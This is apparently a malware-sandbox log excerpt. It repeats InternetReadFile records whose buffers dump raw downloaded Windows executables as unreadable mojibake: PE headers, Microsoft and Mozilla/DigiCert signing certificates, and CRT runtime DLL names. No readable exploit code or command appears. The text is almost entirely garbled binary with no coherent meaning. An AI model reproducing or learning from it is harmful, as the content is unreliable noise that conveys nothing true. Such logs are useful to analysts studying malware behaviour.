PÐ1Ô1Ø1Ü1¨2Ø2è2ø23303<3@3D3`3d3È9Ð9Ô9Ø9Ü9à9ä9è9ì9ð9ô9::::::::MZÿÿ¸@¸º´ Í!¸LÍ!This program canno request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ¼³±]âÿy¡Ñ¸5öáÊ÷qìýþÃàe5XË¤^æ§"¯hó>ÏÞ¤ªØî¤â¡t0\0â¡¸¤µ0²10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher DSE ESN:7AB5-2DF2-DA3F1%0#UMicrosoft Time-Stamp Service¢% 0 +Éì»H-5Ù¾¶÷&©1n2 Á0¾¤»0¸10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0 H÷ ÞÈ0"20180419214648Z20180420214648Z0t0: +Y 1,00 ÞÈ0³00 ÞÞH06 +Y 1(0&0 +Y 0ã`¡ 0¡ 0 H÷ ÑyÄ£§"?ïk¤££o x³³[p ³&PA{[:$!·ÃÊérªÅò\Òxò¶°+ò¢JYÀý?ÑumDÅÃeQAe¾MPþ~u«{_gùkÀ¦ P{ªvz¥Të§åÃ(±ÚLSAì¬E¶y~Ø SJ}Í©´ãMç;õXt¦EVØSÑÕù4¯X¥F¼wÎXä .÷&Yµ`_ \|Á¼çØwCC)ôöIZ]×²£ÌíZ÷·Ëî¯µ`Øè¡ßUÚ7\'§oKq¯ÝWóÎu ßÝ×vôHd /Ê![³R±ne=ääØÀ1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0 `He 20 H÷ 1 H÷ 0/ H÷ 1" w ºbæ7dG×öc°¥¼8>Oíf·T70âH÷ 1Ò0Ï0Ì0±Éì»H-5Ù¾¶÷&©1n200¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@õ«Ê¾ß0 H÷ /cº¶cq"ÑéAæ^ìOo¿]¿.¶¶·3,"¡Ïuh¤ÓDiÙu¾¸ÇäÁË½vr9É¦½!7¤J÷søöIÈªsÈk/JÊÊ1Åo>¬_å"µE!ávãàþsDs? Ê¾Þ$ÑÛÆÇ\|£ÓrãÑ}g¼zª\ö¶wÒcl q2<wÈú¥YæDÜÎí»S½õ»ÑÄ¬n«ug\WÛxÊ1ìò´B¶Ë8ðïÉ$øâÚ±QwñÂäÀâ8ÆfÒÄRÚÍ>UtÝyHÑS©¸"N54¨MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELÖùâ#à! 0ä@" ð= request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ï¯"&àÅ~6jp(à¿¼Ã!¤@kWWÒðk- FÈ§ÇGþ{O#å¬þo/>{Éu»Iü¸DÝú²çú¡t0\0â¡¸¤µ0²10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher DSE ESN:12E7-3064-61121%0#UMicrosoft Time-Stamp Service¢% 0 +9p%ÈyÝ_]é³÷· Á0¾¤»0¸10 UUS10U Washington10URedmond10U Microsoft Corporation10 UAOC1'0%UnCipher NTS ESN:2665-4C3F-C5DE1+0)U"Microsoft Time Source Master Clock0 H÷ ÞÏ0"20180419213407Z20180420213407Z0t0: +Y 1,00 ÞÏ0á0@0 ÞÛO06 +Y 1(0&0 +Y 0ã`¡ 0¡ 0 H÷ Õ8\ÿ ôB-n;£mmÖ÷ÄÐòB½.òxÛÌ¿ùçq²[/f?\è=ÅÎC¸»ºÉOTsÀÆ@Âû¯ =jÎ$ÒÀ§J©µiíèÉ5$ïÞ¥ß¨PåõÈÈ¼¡eqõÑanáúÒ#J'eý9ÞÜ¢ÑàÊQWàv4 N"Ø6ä¾TÞ¸¥gdî»ü¸ÊEÜA Ì]µ1ùè¥ÑoÚ$ók ·® âHK8!/Ó}ÁH.cK×õrWe×ÿe¢½²,þØå&í@f%4¾íFDJI1õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬!¼zÒrô¬0 `He 20 H÷ 1 H÷ 0/ H÷ 1" PÚ9ÎTÑä×õªÉÉ:æ;-Û¹4ç}á³ÈxxÛ0âH÷ 1Ò0Ï0Ì0±9p%ÈyÝ_]é³÷·00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬!¼zÒrô¬0tìüe¨i©¸¶Tÿÿ½øYÂ0 H÷ Uu/}tøÁ$1z<¯t :À×d§4ëHà¿,Þ©ÓÚÉÑÐ¼îo`¦üBØ& !¼[:c´A!d]o¡ªÆ)¬~KµÃ<%~¨ü $ þôé&^ë³³Vjô\|ÔAÀ¶TùøÅa \É+òÈ}z3Ã:?à]çZ3 ZýPPÓr¨'_?&ÕÛXÏÂEUrÔ6aÜF_ÞüXv-·y]õiÑþ¢zv½7Y.'¤ÙQÐ²n'UzôwýØómÓ?Y'#H3R"§¿r¸þI)U4¿0ïX%MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL(ßà! 0V0@ ð request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@õ«Ê¾ß0 H÷ Ôù©ßø(@0)-Ê1vóÔêÍ¬BU^nÌD¹ÅbÇ9&]®peÛHß)tUö®nåú)l ²¯XàÏ¸yÛÝÎIånZRÊ¯µ>G^vMÙú¨dËHÝËÓV¥D£¬9l#QZEÃ¶¡éMG=óNê#ÄÀç·àõº~³Ðd9ñBJSÉµjYüV/3< =³Ei/ÝkâRc¬ ÄRÿa j47d>L¸ÙÞNG¤¿j$Æ-ow7kôp¬©/«.?Ûk¯Ý}}¿R÷ÕÇ´úð¨¶ï$¼øï"jæMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELî±üÒà!.@ P©â@×+@ð4=T.text×,. `.rsrcð@0@@vî±üÒ7ddî±üÒ dî±üÒRSDS9Öëè2éÐ´R1Eapi-ms-win-crt-math-l1-1-0.pdbd.rdatad.rdata$zzzdbg×+.edata@`.rsrc$01`@.rsrc$02î±üÒl::(ø¬Åßø(@Xq¡¹Òê4Mg¸Óî = i Á í !E!o!!Ã!í!"F"s""Ç"ñ"#E#o##º#Ò#î#$)$D$\$s$$$¶$Î$æ$þ$%%D%`%z%%%Ä%Ü%õ%&)&C&]&u&&©&Å&ß&÷& '%'='Q'b's''¢'»'Ò'ë'((9(Q(i((±(ê(#)[))Ë);rªâ*+"+=+^+\|+++°+Ä+Ú+ñ+,,0,G,\,p,,,²,Ç,Û,ð,--2-J-c-{--¤-¹-Î-ä-û-.,.D.Z.p...¸.Ð.å.ù./"/6/K/a/x//¢/µ/É/Þ/ó/ 0 050J0b0{00§0»0Ï0ä0ü0151L1^1q111¯1Å1Ü1ò12242H2]2s22 2 request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0 `He 20 H÷ 1 H÷ 0/ H÷ 1" Û~T- "Nö@Ùa©ÜKó2{ÌZôhbãó7ë0âH÷ 1Ò0Ï0Ì0±ÇÁ½0{¥d^gt6ú»ã¼hû00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0öRó_ÚâÔ¶r#j¶3[+0 H÷ O0Æn¶XÄ®3uVdõÕ ci¾56m¸mYÏ«w?vü'z}B¯D¼&Æ¯ ôBýµ«JA¼x¼ÓU]{ËËÐ43¡:ü¾y³ýÊ<Ñ±ª5 ÔùG·67îlDV&þ[<GÌn>~J cm ¥¼¹öÔÒÿ T ØmI'.]ò´P¢©ÛÆËmÏ¬®lTja@H@z?wçÞ±¢SÆâåÞK½gÜÈ³üo°ñyu+Û7® \ß6ÉÍâC±,ÍûÜï««ìº·!´^K$#1Äe®³X+YÍÿpjtÖ8MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePEL2¨à!$@ PÄ±@ô @ð=T.text"$ `.rsrcð@&@@v2¨<dd2¨ d 2¨RSDS £NqÍ6ð ¹,¿Fîapi-ms-win-crt-multibyte-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgô .edata@`.rsrc$01`@.rsrc$022¨ÈÈ8Xx;`¥Èë1TwÀã'Lq¹ÚüBe«Îñ7Z} Ãæ +LmÊç!>^¤Çê 0 S v ½ â !)!K!l!!±!Ò!ñ!","K"g"""¾"à"#*#O#o##¨#É#ê#$-$P$q$$±$Ô$ô$%/%N%m%%¥%À%Û%÷%&2&Q&o&&¨&Ã&Þ&ø&'3'R'o''¥'À'Û'ö'(2(Q(p((´(Õ(ô()2)R) request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: Ó5¢çÜâÔ=00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¦ýRà'?¦0·l T=AÁg>Häg0 *H÷ ®ÏKÊ44âÊ¢Y %hÓì³ô¨E©¿\èï ÷µt¼ ¾¶³ñ¶ðä£áÃ×U®:ÓRbâeÓ©+`ÛõÜéÿÜ;Ó ´×QÖ~(ôA`HàK0¢%«~ÞìMB4Î?Øsêô&\¦~Áñxsù!Zô·«"ÐÞcwÃ¢¦gKW²cöL3å0ë°c»Ïp9?q0HÊ¨Ìµª^Ã7QªÓE¶µu}èàM¡ü$`öàkIçoeÏn¥cïeìQâ[h%tì¦ÂÍbÛx2¡Ð0°qÄ#Æ¤_L_ÀÞf·bÏL@MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELÓÊà!0 @Ú@Å0ð=T.textÕ `.rsrcð0@@vÓÊ:ddÓÊ d ÓÊRSDSÝm©q\|3í;³/>n5^Èapi-ms-win-crt-runtime-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgÅ.edata0`.rsrc$01`0.rsrc$02ÓÊfkk8ä«Íò4SsµÖøEgÌí)NnÈý&Ef·ß'DjªÈè >ËJn²;a²ó2b°ö1YÚ C l Ä ê !2!V!!Ç! "P"n""¦"Ä"ã"##<#Z#u##¡#½#Ý#ÿ##$D$c$$©$Ê$ç$%%9%W%p%%¨%Â%Âá)Hg©Êë7\{¢Áà?f±è:Y\|«Ìû=T¿Úÿg¬ó>_ç.QzÚXuÓ"Ir¯ 3 \ ¶ Û !'!F!o!¶!á!B"g"~""º"×"ø" request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀeâ©0 `He 20 H÷ 1 H÷ 0/ H÷ 1" }\|{4ýàèøîÞ³Òw$ U»rSÇ}±^ÿ£0âH÷ 1Ò0Ï0Ì0±]:¿V½á)Êrd÷u;x"ëô00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103©TpÙyÀeâ©0 SâdIëO mË¼&TÔj0 *H÷ ( ;£jªM¦ì$HìSw0¼ÔB?Ín\ÅÔ´¬©Á?Øí§ð,ÒØ6OãVpQ{>ÓOXÒ§ Är8,ª8¬) MKz¸Òûjg`ý³ÑÈHÏ©<1Å÷7÷¹V.e3½Å±Íûäo¹¢ ÒÉ`½Ð¢ç6Ó²+¢b5I´IE®ÔW(¥×aó 9?uIÎÏß¸ÊKV{À$ÈiZ Ü%ÝF¦0å¾wS23óPZÀ!§öÉký»[Ù4k9_ì ß}Í²Mi\|ÇSIUãh¾MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELì½Gà!0 @»@a0ð"=T.texta `.rsrcð0@@vì½G8ddì½G dì½GRSDS9uGºlÂkyìÖapi-ms-win-crt-stdio-l1-1-0.pdbd.rdatad.rdata$zzzdbga.edata0`.rsrc$01`0.rsrc$02ì½G^(¤ ´Õ<y³ì)h¤à ]ÕHÄ)D^v£·Ëè.TuºÚþ9Z{Àâ 0Qu¶×û$ G j Ù !)!C!b!~!!¹!Ò!ì!""6"P"k"""¾"ß"ö"#)#E#b###¬#Ç#ô##$B$[${$$µ$Í$è$ %1%R%l%%¡%¾%Ý%û%&3&N&f&~&&¸&Ü&ù&'2'O'l'''±'È'Þ'õ'("(9(O(f(}( request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 0±Éì»H-5Ù¾¶÷&©1n200¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103«^@îFß,l«0ìØU¹ÇË~>I¼@õ«Ê¾ß0 H÷ 7ú¦ÃéÉ¹N)^© òàsßÖF¸Üg ÈôFUa°@î'£rí ð1´j´u°µ¾(e7ºÝoï-é9VU¶ ùµrêbã^^5ä\|[ø°uxôérvé9gÐèðfªwÃHÉ.Âë§à½ÊÁ1>Pþx9s¤uå·-øä6ºµ{Ê.kUæw$á0:òsµ7¶kSè Zª/!Ní°Òà_LúM'61ðfÉB_ô0 p3¥gtØß¿Ì1í¸ÌKwªv~Ìï1F®§1©,ýo§¹ÐÛ²/âpÄöMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELbýMGà!0 @P@ß0ð"=T.textï `.rsrcð0@@vbýMG9ddbýMG d býMGRSDSàå'ÍÓ©Åû! kapi-ms-win-crt-string-l1-1-0.pdbd.rdatad¬.rdata$zzzdbgß.edata0`.rsrc$01`0.rsrc$02býMG,²²8ÈWs¬Êè#BaºÙø<[z¸Øù;[{½Þÿ Ab¥Çå<XrÌé!@_~¼Üý9Un¤¿Üû 8 U r ¯ Ð ð !&!C!a!!!¸!Õ!ô!"2"Q"p""±"Ð"í" #"#=#X#s##¯#Ï#ë#$!$:$S$l$$$º$Ö$ï$%!%:%T%o%%¥%À%Û%ö%&,&G&b&}&&´&Ð&è&þ&'3'M'd'}''®'Æ'ß'ù'()(D(_(x((®(Ç(ß(ö()))B)[)v)))Æ)ß)ø)(A[s¦ÁÚõ*+)+A+X+q++£+½+Û+Mj¢¿Þû request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ®{ë]ìår ¥>ÔK#ÔÂoHæÂùSÊ³¢áá]uä3Ô¨_û MÄaÄ<£úÎÌ¤å1ì¡P¦§ vCª/<ÌûþµÎ/¥ÆÈ®¢#ú6ëzfÛ¨ÖùìèW@À¡¡<ÚrÅlN?çou8/«'ç¾¸¯ÖîÇÜêeÖIÛÎ2@h5[ Tý0ï"mìí;MÆTê-\|j"éï)l³ç;7RòÅê×4&qüÅ´XÆpÖBe\æ0¾²D¹%sh×¬aMZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELÀ#à! 0¸í@½ ð=T.text½ `.rsrcð @@vÀ#7ddÀ# dÀ#RSDSàV¾mw:Èdþ9 \|]mapi-ms-win-crt-time-l1-1-0.pdbd.rdatad.rdata$zzzdbg½.edata `.rsrc$01` .rsrc$02À#øHH(Hh =\z¹Üü8Vs«Èå&Da~¹Ö÷?b¢Áàÿ!Fk´Õô0Nk©ÆâûEe~µÔõ3Rq¯Îí)D_x«2Qp¬Ïò.Kj ¿Úù;Vu¯Ìé1VwµÖó7^¨Éê$E` »Úó5^u«Èé 'He£Äá<Ur¢ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGapi-ms-win-crt-time-l1-1-0.dll_Getdaysucrtbase._Getdays_Getmonthsucrtbase._Getmonths_Gettnamesucrtbase._Gettnames_Strftimeucrtbase._Strftime_W_Getdaysucrtbase._W_Getdays_W_Getmonthsucrtbase._W_Getmonths_W_Gettnamesucrtbase._W_Gettnames_Wcsftimeucrtbase._Wcsftime__dayligh request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ÷ 1Ò0Ï0Ì0±ÇÁ½0{¥d^gt6ú»ã¼hû00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0öRó_ÚâÔ¶r#j¶3[+0 H÷ /HÃµêN¸5là}1ô¿pZ±±}Ê g+ùO1õ¨1¨ ÿ±C ÍH¸ÿÜÒÒ[ñOB²¢¼õÈwXüPæ`¨<° Þ-yLM¾à]Ñ«dÿ¨¦ÈÃ!úP%ÊÝJ¤¶èTvNi´cQÝ6ï¼Éä²ÖR.H4VW&RüûbQW}/zhoÝ¯/ÇHÍq³Vâºt¨mâ·çbÆbXW{íR?s~X ÜAÜ¨\s¤Ò ±õ -±aF}N°Ô ¿C+¸ïüJÜbMö#O%¡MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $3AÁw ew ew eDev eDau eDv eDgv eRichw ePELêËà! 0Né@^ ð=T.textn `.rsrcð @@vêË:ddêË d êËRSDSRdYßDïüëëF»api-ms-win-crt-utility-l1-1-0.pdbd.rdatad¬.rdata$zzzdbg^.edata `.rsrc$01` .rsrc$02êËd8°(®Ø#<Ul¢¼Óê+@[r ¶ÉÝò4I_Èñ3Ne\|¶Ëäù'8Qn±Ä×ì/BY api-ms-win-crt-utility-l1-1-0.dll_abs64ucrtbase._abs64_byteswap_uint64ucrtbase._byteswap_uint64_byteswap_ulongucrtbase._byteswap_ulong_byteswap_ushortucrtbase._byteswap_ushort_lfinducrtbase._lfind_lfind_sucrtbase._lfind_s_lrotlucrtbase._lrotl_lrotrucrtbase._lrotr_lsearchucrtbase._lsearch_lsearch_sucrtbase._lsearch_s_rotlucrtbase._rotl_rotl64ucrtbase._rotl64_rotrucrtbase._rotr_rotr64ucrtbase._rotr6 request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: õ0ñ00\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0 `He 20 H÷ 1 H÷ 0/ H÷ 1" È÷ ^OëCÔÚß§McO ,l/ââÉäãb0âH÷ 1Ò0Ï0Ì0±ÇÁ½0{¥d^gt6ú»ã¼hû00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103®ÖNÛõ®0öRó_ÚâÔ¶r#j¶3[+0 H÷ ±[4êªï"ØÞnÆ¨:é'ÛÐ¿ÅÚü7ÙÛ}Ù¢±¤!öÙ¿T®~&XºØ½eW\ØÿÆ2P9Ùòïý¾§-àÅ1#ÚÁÙÔPWãùTÁ¢ñÁ g ìÜ"{¼5;Ð3~þx7³y«4÷Þ×Ê!T{&þÛ»õniï´øZOÿð&ÚHRP; ÊªÞ@ÊåbEÙöR+ ±ÇøCµBÔÈ5 ReH©d°ÛðMIÙ´¨ð¢rË\|ªå(@m×d÷v ÎR;I¾« (Å!-o¯À»ù£ÍMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9î¯`à"!¨:p¬@6@Aµ>´Ii\|ð¨æ¸=Ü6,â8À $Ü=`.textö§¨ `.rdatatìÀî¬@@.data´°@À.00cfgÐ@@.tlsà @À.rsrc¨ð¢@@.reloc=>¨@BUåMÐ]ÃÌÌÌÌÌUåSWVXÁ5 PXº9ÁtºÒ¸1À1ÿ¢ÀªÆ1À1É@¢ÈÁê$â¢U¶ÈT¶Áè $þ¢V¶ øºÏ¢W¶ÈÁè$¢X¶È!ÑÁè$9Ñ¢Y¶1ÉÐà1ÛøZ¶þrøu¸1É¢Àëãø[¶Áè$¢\¶^_[]Ã1À¢T¶¢U¶¢V¶¢W¶¢ request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: ÁÖÈ\Aÿy_PT¡ºÅ 9¸rPÒ_K3°K¥Þå5ÑûA±Aú/w¢Æ´øÍ/PÞý)Z}Ràû§«/FvÚWúÇH »Ëã+,</5»GêWrøb]pî0¯BïNxöôÉhi }³÷MÍ TO¬»/ÈæãÇð¦#O~âh·kÚG¯ëÚlX×â{j5xêÀ¶`FåùàMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELMî¯`à"!B°?°ìò@Aìô!T pT¸°¸ÿta` 'X.text®AB `.rdatatÜ`ÞF@@.dataÌL@$@À.00cfgN@@.rsrcp P@@.reloc¸ÿ°T@BUåSWV}ÿ r*hNhëTh¥<h/djèCÄ¾ð^_[]Ã¸y¾èl¹oU£øBÎÛt p@ÖÿSÿÑòÄ½lM1öÒq½¼l}wt M¼lÛt x@ÿSÿÑÄé\|ÿÿÿÌÌÌÌÌÌÌÌÌÌÌUå}t p@ÿ]ÿá]ÃÌÌÌÌÌÌUå}t x@ÿ]ÿá]ÃÌÌÌÌÌÌUåWVäøì@MEt$ç1êT$1ÒVWQWVPèÈþÿÿÄÆÀuMT$E$L$1éè6ðeø^_]ÃÌÌÌÌÌÌÌÌÌÌUåSWVì¡@M}1èEðqöt p@ÿVÿÑMÄÿ&UEÿ$½ÇÇÖU¹ø1ÿöyÇéiy[uMè÷½MA1ÿÀ¥º1öIÉAMàUØ}ä·ÔD< @z,EÜÿWÿÑÄÇ L@¯}ÜÿSÿÑÄøMùu MàI÷yD}äMUØÇAFÂ9ÆiÿÿÿëMëíy[uMè½MEU8Ç1ÿé1ÿGéxÇEìy[uMèÿ¼MEìøy81ÿAùÁá\MÛ P@ÿjÿÑÄK,1ÒKKK<¯È¸MìMì request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: 710¡https://mozilla.org0 H÷ mÒ@C(ÈÒ>v»ÛãL!©¦Çï@(×±$AU$³pÕ4W²ØVÌ°¼Uê¨î¶E5_ aÆä²È¡Â}ð.Ç\| \%»·,''§»beP:¤VEeø?Æ;?è{ôgÍì,C<rÁÕ8´è°Ø[Ù»= k\4r§³¤0s"ÄéÕ®PseS8ïó[ s~pKv$,õþp4HEk<ùY0û¹ ö@n#&òÄÙ¥ZÍBNªº´Ô§ 5¤U¤>&;Ì°7ð$ò;Óem}â¶-ßQïR{·0µ(x(´ÉÒîÇÑ§ÞMOx6äRòò© 27ãNHMÏ¯æ·`ºá×.ùÐ_;q¿Bf9 @kÏ©±di£°i¿»Äz ¹lÓèÜ©5Î ÂV2ìÕ¼ü{e³ z/öP!EHëËÕã3I²«g6õ¢®ÒiT_m ñ?Ep0/n[ÝÚÃZ:W¯«{£¿2ÒÀæúìÈÙ.i¶³Æz)k¹é<YÐG,OÒV#¹{¥Ó jî(ñrÈAÞ}¥¯ìð¾ÇPt\ë·Gø¼=+d¹:2WcÀx¡00, H÷ 1000r10 UUS10U DigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ÿ`@!ÎðÝ0 `He i0 H÷ 1 H÷ 0 H÷ 1 210527192334Z0/ H÷ 1" Ååu`²ºò³$ÍÌt?yÉ©L3Õ×ø2c0 H÷ ¦ÑÔvX÷¼V©úÿö¶½ÞMLµªUu>A:fU-(H¬$86Ö¬ÊH »¸@ú2jqæªÄ½«âNå<98ä-j$xÙßísWêÄù¬Ã s:)¯Ü(BàÑ÷InÄÙ¤ÒúAðèM;e¢Q_MÚ%íHôÂN¹·§SkÍ¸%¢ßEí¾¹öÕw%ÿsYÂÐËÏåõ=²â)9ÎíØ2;qÅ`iòY»8-`;mÉ¼ã9©^kZðlïÔM.z.i«¡ÊxÛÒ8Õôµº3»,ÁtMZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ºùå¬þÿþÿþÿJdÿüÿ÷àÿõÿþÿÖÿvÿþñÿvÿþíÿvÿþûÿvÿþåÿvÿþÿÿvÿtÿÿÿvÿþÿÿRichþÿPELú>[à"!æ P® @¡8@A°ë ¸ @?0¸ 8È @´.textÄäæ `.dataê@À.idataì@@.rsrc ò@@.reloc¸ 0ø@B request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: hington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬!¼zÒrô¬0 `He 20 H÷ 1 H÷ 0/ H÷ 1" o3JÇK5¼2ïÄ¼?Ö"E$E:ë_0âH÷ 1Ò0Ï0Ì0±9p%ÈyÝ_]é³÷·00¤~0\|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103¬!¼zÒrô¬0½¿iäýø_Vòí¥oøÜk0 H÷ YÕvT3¸e[Ã³HÄØ±CDK±ùÁo¢ìíEÔ¥ßÑrzàa7DhZ¨ã§Õ`6ÅØÚþ't¸WþV@½6B5 ëÚ4\RJ5`««»{þy´gè48ÕpNÙÝwÇ@b¨Z MQ¦Îjëº¼!Ø0ÂÐN_?%-È 1³"eÜ·yÝ@&ºð}$Þt®$ÈJ¢2Hûg!èÂZw@hÕÍ"´JÅª¥ýùçß" X#®eâx*ÜÇï÷ó@?³×3OòÍL¶jÎ°Ô<xe0MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELxî¯`à"!ä20é° êå @Aú S_ú Èp p ¸ #dô hü @.textOãä `.rdataè@@.data0F î @À.00cfg` ð @@.rsrcpp ò @@.reloc # $ö @BUåhOè²âÄÀt8Ààð]ÃhàÿÿèâÄ1À]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUåWVEÀt}uUMÿt"òò0ë(hàÿÿè?âÄ¸ÿÿÿÿë&Ç4¦¦¦¦Ç0¦¦¦¦jVjjRQPèyÄ^_]ÃÌÌÌÌÌÌÌÌUåSWVhOèÿáÄÀt0Ç1ö8Ççðtk]EUMÛtòò0ë%hàÿÿè²áÄ1öë<Ç4¦¦¦¦Ç0¦¦¦¦jRjjPQWèxÄÀ request_handle: 0x00cc000c	1	1
InternetReadFile July 22, 2021, 1:53 p.m.	buffer: Hi)¡N¨ãæ¾IÌeV=Ä0' +710¡https://mozilla.org0 H÷ (¢êh!èeýF%mÝ¨&µgwº<ÚÌ3ÐJÁª¥Ùn¥¬4PðhPYçÚetjæî}@Â³~?äàP\|À¢¾4=ãóUÙÌøMßbCD¶.®Õ 4nÛRR5bÅHë¿Ï3^eüÇ~j05Íãðú.²'ð@ìøÇ®K}BÊ§ü6Íñ0µle´ôòi»ØÔéLÎmkÝ\|eã7WGã¡+YDÂÕiPÍ±ÿº¥>µ©HBå:çy±ãRjÄßaN°0¦r6ãÉ¼!¹¹ÛíUg üÅÊ(ÍÁÝ Æî»÷)òÓ¬-x~aäyè£ª@dYv¡~lí1@Ø§\|%(f_OizgÎMvgä»ÂÎ¥\|¥w¬<Ðþ6 ¿éÎeBI¨ßH¤zÑ¼ë3Î×ÇSsÐöÒÉSNr¼ä}Ý(zO¾~ÙJÍLí©sv¾ÒLÆs@C1ýsÊÜ»`ß ×v]ÃdJ±4?Ìó±r<ßÆêfiÛ}dÎÆgðFììôî¼·d¥FlRã7¾0c'j2óoºiç¦?\hånblà,0Ê2%¦¡00, H÷ 1000r10 UUS10U DigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CA BJà¾:ÿ`@!ÎðÝ0 `He i0 H÷ 1 H÷ 0 H÷ 1 210527192334Z0/ H÷ 1" JèW´Ýsâö(CÓjH¶ÊwU9 ^«mÍµ0 *H÷ FS$Ð¥þ?]E~lëlJ±>F)Î.êÇøs?ß°=+þþìÿ^ @µ§ù +[Ü^ö;g¹QÜÅ_OF§vùl>ûBx1ODéï] ë¬ÀrÅ²'6Ï&¸¤Â7Y:ª>`¼åØÆS5¾_÷Á8÷ià6@ùxÚ$ ÝèF%ÎxNÅôOÅ=òã.Í«3î#ÒÎÌ×kéÏ±n]-á»VBqÅ¯J- F)F!ïXÔ77§VaèüN`°x!IÊ²ÇË½ÞrÞÊÕdÏIðÒCFÆMZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELyî¯`à"!¦îP¨à@ADSSTðx¸ 4DNÀ X.text&¤¦ `.rdataÔ¨Àªª@@.data@pT@À.00cfg\@@.rsrcx^@@.reloc4 6b@B request_handle: 0x00cc000c	1	1
